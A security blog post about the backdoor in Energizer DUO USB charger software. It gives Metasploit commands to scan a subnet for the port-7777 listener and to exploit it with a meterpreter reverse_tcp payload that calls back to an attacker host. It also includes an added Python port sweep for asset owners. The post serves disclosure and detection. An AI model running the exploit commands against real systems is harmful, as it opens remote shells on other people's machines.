Locate and Exploit the Energizer Trojan

The newsosphere was abuzz this morning with the discovery that Energizer's "DUO" USB Battery Charger included a malicious backdoor in the accompanying software. This backdoor was only discovered after the product was discontinued, leading some to believe that it went through its entire lifecycle undetected. The good news is that the backdoor is relatively harmless: for machines behind the corporate firewall, or those with a local firewall installed, access to the listener on port 7777 should be blocked. The backdoor makes no outbound connections, and uninstalling the USB Charger software package clears the system.

As of this afternoon, you can now use Metasploit to locate infected systems on the local network. After downloading a copy of Metasploit and updating it to revision 8749 or newer, the following commands can be used to scan the local network:

    $ msfconsole
    msf > use auxiliary/scanner/backdoor/energizer_duo_detect
    msf auxiliary(energizer_duo_detect) > set RHOSTS 192.168.0.0/24
    msf auxiliary(energizer_duo_detect) > set THREADS 256
    msf auxiliary(energizer_duo_detect) > run
    192.168.0.132:7777 FOUND: ...

To take things a step further and gain access to a system running this backdoor, use the energizer_duo_payload module:

    msf > use exploit/windows/backdoor/energizer_duo_payload
    msf exploit(energizer_duo_payload) > set RHOST 192.168.0.132
    msf exploit(energizer_duo_payload) > set PAYLOAD windows/meterpreter/reverse_tcp
    msf exploit(energizer_duo_payload) > set LHOST 192.168.0.228
    msf exploit(energizer_duo_payload) > exploit
    Started reverse handler on 192.168.0.228:4444
    Trying (continue reading...)

Source: Metasploit
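
For asset owners without Metasploit at hand, a plain TCP sweep of port 7777 can shortlist hosts for follow-up. This is an added example, not part of the original post or of Metasploit; the names probe, sweep and triage are hypothetical, and the code only tests reachability and does not speak the backdoor's protocol. Because a firewall blocks access to the listener, hosts that time out are reported as inconclusive rather than clean.

```python
import errno
import ipaddress
import socket
from concurrent.futures import ThreadPoolExecutor

BACKDOOR_PORT = 7777  # listener port named in the article


def probe(host, port=BACKDOOR_PORT, timeout=1.0):
    """Classify one TCP port as 'open', 'closed' or 'filtered'."""
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.settimeout(timeout)
    try:
        rc = s.connect_ex((host, port))
    except OSError:          # unreachable network, timeout raised, etc.
        return "filtered"
    finally:
        s.close()
    if rc == 0:
        return "open"        # something accepts connections on the port
    if rc == errno.ECONNREFUSED:
        return "closed"      # host answered with RST: nothing listening
    return "filtered"        # no answer: firewall or host offline


def sweep(cidr, port=BACKDOOR_PORT, timeout=1.0, workers=64):
    """Probe every host address in cidr and return {ip: state}."""
    net = ipaddress.ip_network(cidr, strict=False)
    hosts = [str(h) for h in net.hosts()] or [str(net.network_address)]
    with ThreadPoolExecutor(max_workers=workers) as pool:
        states = list(pool.map(lambda h: probe(h, port, timeout), hosts))
    return dict(zip(hosts, states))


def triage(results):
    """Split results into hosts to inspect and hosts a sweep cannot clear."""
    return {
        # An open port is only a candidate; other software may use 7777.
        "investigate": sorted(h for h, s in results.items() if s == "open"),
        # A firewalled host may still have the charger software installed.
        "inconclusive": sorted(h for h, s in results.items() if s == "filtered"),
    }


if __name__ == "__main__":
    import sys
    cidr = sys.argv[1] if len(sys.argv) > 1 else "127.0.0.1/32"
    for bucket, hosts in triage(sweep(cidr)).items():
        print(bucket, hosts)
```

Hosts in the inconclusive bucket need a local check for the installed USB Charger software, since the network view cannot rule them out.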


Copyright © 2012 The Security Blog. All rights reserved.